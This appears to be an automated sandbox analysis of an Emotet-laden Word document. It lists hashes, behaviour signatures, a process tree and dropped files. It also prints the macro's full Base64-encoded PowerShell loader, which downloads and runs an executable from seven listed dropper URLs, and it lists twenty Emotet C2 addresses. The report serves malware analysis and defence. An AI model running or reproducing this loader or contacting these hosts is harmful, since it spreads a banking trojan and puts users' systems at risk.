Analysis

  • max time kernel
    20s
  • max time network
    15s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    15-10-2020 07:37

General

  • Target

    aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63.doc

  • Size

    142KB

  • MD5

    0b5d5c4468a31e83e1ec8a0d8b120496

  • SHA1

    68ac3e73c7bb88172984109977a8dc0f2c095522

  • SHA256

    aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63

  • SHA512

    44b5682ac2f14a0de257bcab0eb42fc725536be8d9ecc432ca3a19ff3425c9b867a85b3d3b37cb1416f76b51d86ae2fcb563641f9fd6b18de0b34024dbc48fd1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://ziaonlinetutor.com/wp-content/a/

exe.dropper

https://bharatlearningsolutions.com/content/MNd/

exe.dropper

https://trungtammtc.com/wp-admin/LP/

exe.dropper

http://bigprint.pictures/cgi-bin/o/

exe.dropper

https://avozdecamacari.com/home/000~ROOT~000/dev/shm/E/

exe.dropper

https://calculafacturaluz.com/sys-cache/9W/

exe.dropper

http://evisualsoft-001-site3.atempurl.com/wp-content/C7/

Extracted

Family

emotet

Botnet

Epoch1

C2

188.157.101.114:80

192.175.111.214:8080

95.85.33.23:8080

192.232.229.54:7080

181.30.61.163:443

186.70.127.199:8090

200.127.14.97:80

70.169.17.134:80

24.232.228.233:80

172.104.169.32:8080

50.28.51.143:8080

177.73.0.98:443

149.202.72.142:7080

37.187.161.206:8080

202.29.239.162:443

213.197.182.158:8080

202.134.4.210:7080

190.24.243.186:80

201.213.177.139:80

105.209.235.113:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1000
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD JABNAGEAMQB0AHIAZQBmAD0AKAAoACcAUgAnACsAJwBrADQAJwApACsAJwA2AHUAJwArACcAeABwACcAKQA7ACQATQB1AG4AbAB3ADIAcwA9ACQAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARABlADkAawBpAHcAMQA9ACgAJwBJAHYAJwArACgAJwA3AHgAZQAnACsAJwB5AG4AJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAUwBlAHIAcAByAG8AZgBpAGwARQBcAG8AdwBnAFkAXwBQAE0AXABnAHQARwBtAF8AWQA1AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAGUAYwBUAE8AUgBZADsAJABTAHIANQB2AGIAXwAzAD0AKAAoACcATQBnACcAKwAnAF8AMQB4ACcAKQArACcAcwAnACsAJwA4ACcAKQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAEMAVQBgAFIAaQB0AGAAeQBwAHIATwBgAFQAbwBjAG8ATAAiACAAPQAgACgAJwB0ACcAKwAnAGwAJwArACgAJwBzADEAMgAsACAAJwArACcAdABsAHMAMQAnACsAJwAxACcAKQArACcALAAnACsAKAAnACAAdABsACcAKwAnAHMAJwApACkAOwAkAEMAcwBoADcAMgB1AHgAPQAoACgAJwBIAGkAZwAnACsAJwA3AGoAJwApACsAJwBzADcAJwApADsAJABZAHoAYwBlAGYAawBfACAAPQAgACgAJwBYACcAKwAnAF8AZQAnACsAKAAnAGMAJwArACcANAA1ACcAKQApADsAJABFAG4AcwA0AGMAdwBhAD0AKAAnAFcAJwArACgAJwB6AGoAdAB4AHEAJwArACcAcwAnACkAKQA7ACQARQA2ADkAawA0ADQAOAA9ACgAJwBaACcAKwAoACcAawBfADQAeQAnACsAJwBuADYAJwApACkAOwAkAEwAeABtAHMAOABvAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ATwAnACsAJwB3ACcAKwAnAGcAeQAnACsAJwBfAHAAbQB7ADAAfQBHAHQAJwArACcAZwBtACcAKwAnAF8AeQA1AHsAMAB9ACcAKQAtAGYAWwBDAGgAYQByAF0AOQAyACkAKwAkAFkAegBjAGUAZgBrAF8AKwAoACgAJwAuACcAKwAnAGUAeAAnACkAKwAnAGUAJwApADsAJABHADYAYgBzAGoAMgB2AD0AKAAnAEgAbwAnACsAKAAnAG0AaABfACcAKwAnAF8AJwApACsAJwBqACcAKQA7ACQASwBoAHYAdwAwAG0AZgA9AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAATgBlAFQALgB3AEUAYgBDAEwASQBFAE4AVAA7ACQARwAyADIAeQBoAHQAagA9ACgAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAJwArACcAcwA6AC8ALwAnACkAKwAoACcAegAnACsAJwBpAGEAbwBuAGwAaQBuAGUAJwArACcAdAB1ACcAKwAnAHQAJwApACsAKAAnAG8AcgAnACsAJwAuAGMAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAHcAcAAtAGMAJwArACcAbwBuAHQAZQBuACcAKwAnAHQALwAnACkAKwAnAGEAJwArACcALwAqACcAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnAHMAOgAnACsAJwAvACcAKwAoACcALwBiACcAKwAnAGgAYQByAGEAdAAnACsAJwBsAGUAYQAnACkAKwAnAHIAJwArACgAJwBuACcAKwAnAGkAbgAnACkAKwAoACcAZwBzAG8AJwArACcAbAB1AHQAaQAnACkAKwAoACcAbwAnACsAJwBuAHMAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALwBjACcAKwAnAG8AJwApACsAJwBuAHQAJwArACcAZQBuACcAKwAoACcAdAAvACcAKwAnAE0AJwApACsAKAAnAE4AZAAnACsAJwAvACoAJwArACcAaAB0AHQAJwArACcAcABzADoALwAnACkAKwAoACcALwB0AHIAJwArACcAdQAnACkAKwAoACcAbgAnACsAJwBnAHQAJwApACsAJwBhACcAKwAoACcAbQAnACsAJwBtAHQAYwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuAC8ATABQAC8AKgAnACkAKwAoACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwBiAGkAZwAnACsAJwBwAHIAaQBuAHQAJwApACsAJwAuAHAAJwArACgAJwBpAGMAJwArACcAdAAnACsAJwB1AHIAZQBzAC8AJwApACsAKAAnAGMAZwBpACcAKwAnAC0AYgBpAG4ALwAnACsAJwBvAC8AJwArACcAKgAnACkAKwAnAGgAdAAnACsAJwB0AHAAJwArACcAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACgAJwBhAHYAbwB6ACcAKwAnAGQAZQBjAGEAbQAnACsAJwBhACcAKQArACcAYwAnACsAKAAnAGEAcgBpACcAKwAnAC4AYwBvAG0AJwApACsAJwAvAGgAJwArACgAJwBvAG0AZQAnACsAJwAvADAAJwApACsAJwAwADAAJwArACgAJwB+AFIAJwArACcATwBPACcAKwAnAFQAfgAwADAAMAAnACsAJwAvACcAKQArACgAJwBkAGUAJwArACcAdgAnACkAKwAoACcALwBzACcAKwAnAGgAbQAvACcAKQArACgAJwBFAC8AKgBoAHQAJwArACcAdABwAHMAJwApACsAJwA6AC8AJwArACgAJwAvACcAKwAnAGMAYQBsACcAKQArACcAYwB1ACcAKwAoACcAbAAnACsAJwBhAGYAJwApACsAJwBhACcAKwAnAGMAdAAnACsAJwB1AHIAJwArACgAJwBhAGwAJwArACcAdQAnACkAKwAoACcAegAuACcAKwAnAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHMAeQAnACkAKwAoACcAcwAnACsAJwAtAGMAJwApACsAJwBhACcAKwAoACcAYwBoAGUALwAnACsAJwA5ACcAKwAnAFcALwAqACcAKQArACcAaAB0ACcAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAGUAdgBpACcAKQArACgAJwBzAHUAYQAnACsAJwBsACcAKQArACgAJwBzAG8AJwArACcAZgAnACkAKwAoACcAdAAnACsAJwAtADAAMAAxAC0AcwBpAHQAZQAzACcAKwAnAC4AJwApACsAJwBhACcAKwAnAHQAZQAnACsAKAAnAG0AcAB1AHIAbAAnACsAJwAuACcAKwAnAGMAbwAnACkAKwAnAG0ALwAnACsAJwB3AHAAJwArACgAJwAtAGMAbwBuACcAKwAnAHQAJwApACsAJwBlACcAKwAoACcAbgB0AC8AJwArACcAQwAnACsAJwA3AC8AJwApACkALgAiAFMAcABgAEwASQBUACIAKAAkAE0AdQBuAGwAdwAyAHMAKQA7ACQASwA4ADkAaQA3AHUANgA9ACgAKAAnAE0AJwArACcAbAA1ADMAeAAnACkAKwAnAGkAJwArACcAZwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAeAB4AGoAbwA4ADkAIABpAG4AIAAkAEcAMgAyAHkAaAB0AGoAKQB7AHQAcgB5AHsAJABLAGgAdgB3ADAAbQBmAC4AIgBEAE8AdwBuAEwATwBBAGQAZgBgAGkAYABMAEUAIgAoACQASAB4AHgAagBvADgAOQAsACAAJABMAHgAbQBzADgAbwBqACkAOwAkAFYAcQBrADMAcABfADUAPQAoACcARwB5ACcAKwAoACcAYQBwACcAKwAnAHIAJwApACsAJwAxAGcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAeABtAHMAOABvAGoAKQAuACIAbABgAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADMAOQA4ADIAMAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACgAJABMAHgAbQBzADgAbwBqACkAOwAkAEwAbgAzAHEAdwAwADEAPQAoACcAUgBiACcAKwAoACcAOQAnACsAJwA4ADUAJwApACsAJwB4AGIAJwApADsAYgByAGUAYQBrADsAJABXAG0AdQB6AHIAZQBwAD0AKAAnAE0AXwAnACsAJwBpAHQAJwArACgAJwBxACcAKwAnADcAMwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwAxAGgANwBwAGIAaQA9ACgAJwBPADQAJwArACcAMgAnACsAKAAnADAAJwArACcAOAB1AHAAJwApACkA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1568
    • C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
      "C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:360
      • C:\Windows\SysWOW64\nsi\FXSEXT32.exe
        "C:\Windows\SysWOW64\nsi\FXSEXT32.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:924

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
    MD5

    4b4ad9b98f2c90eec2748c2705765f9e

    SHA1

    d74849e36e5c0778181f9038ce2850d15cb5704c

    SHA256

    7caa834892838fdb95a41b8395b7a11789074da59640c5703a20790cc8646cfb

    SHA512

    88b8fdc693664641388e7b6e270961e86ecac98213f1c7e765d6ae822e32902de2f660d67d51e08a2250271599bf22cc3259c608ba73ceb2172ad3a3995fb9f6

  • C:\Users\Admin\owgY_PM\gtGm_Y5\X_ec45.exe
    MD5

    4b4ad9b98f2c90eec2748c2705765f9e

    SHA1

    d74849e36e5c0778181f9038ce2850d15cb5704c

    SHA256

    7caa834892838fdb95a41b8395b7a11789074da59640c5703a20790cc8646cfb

    SHA512

    88b8fdc693664641388e7b6e270961e86ecac98213f1c7e765d6ae822e32902de2f660d67d51e08a2250271599bf22cc3259c608ba73ceb2172ad3a3995fb9f6

  • C:\Windows\SysWOW64\nsi\FXSEXT32.exe
    MD5

    4b4ad9b98f2c90eec2748c2705765f9e

    SHA1

    d74849e36e5c0778181f9038ce2850d15cb5704c

    SHA256

    7caa834892838fdb95a41b8395b7a11789074da59640c5703a20790cc8646cfb

    SHA512

    88b8fdc693664641388e7b6e270961e86ecac98213f1c7e765d6ae822e32902de2f660d67d51e08a2250271599bf22cc3259c608ba73ceb2172ad3a3995fb9f6

  • memory/360-15-0x00000000003C0000-0x00000000003DF000-memory.dmp
    Filesize

    124KB

  • memory/360-16-0x00000000003E0000-0x00000000003FE000-memory.dmp
    Filesize

    120KB

  • memory/360-13-0x0000000000000000-mapping.dmp
  • memory/924-21-0x00000000005A0000-0x00000000005BE000-memory.dmp
    Filesize

    120KB

  • memory/924-20-0x0000000000350000-0x000000000036F000-memory.dmp
    Filesize

    124KB

  • memory/924-18-0x0000000000000000-mapping.dmp
  • memory/1000-4-0x0000000007D40000-0x0000000007F40000-memory.dmp
    Filesize

    2.0MB

  • memory/1000-2-0x0000000009510000-0x0000000009514000-memory.dmp
    Filesize

    16KB

  • memory/1568-8-0x000000001AD40000-0x000000001AD41000-memory.dmp
    Filesize

    4KB

  • memory/1568-12-0x000000001B970000-0x000000001B971000-memory.dmp
    Filesize

    4KB

  • memory/1568-11-0x000000001AB30000-0x000000001AB31000-memory.dmp
    Filesize

    4KB

  • memory/1568-10-0x0000000001E20000-0x0000000001E21000-memory.dmp
    Filesize

    4KB

  • memory/1568-9-0x00000000022E0000-0x00000000022E1000-memory.dmp
    Filesize

    4KB

  • memory/1568-7-0x0000000001E50000-0x0000000001E51000-memory.dmp
    Filesize

    4KB

  • memory/1568-6-0x000007FEE9B90000-0x000007FEEA57C000-memory.dmp
    Filesize

    9.9MB